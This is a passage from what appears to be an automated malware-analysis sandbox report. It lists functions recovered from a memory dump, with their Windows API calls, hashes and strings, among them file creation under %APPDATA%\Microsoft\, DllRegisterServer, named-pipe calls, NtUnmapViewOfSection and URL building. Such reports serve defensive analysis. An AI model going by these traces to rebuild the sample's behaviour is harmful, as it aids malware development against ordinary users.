    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
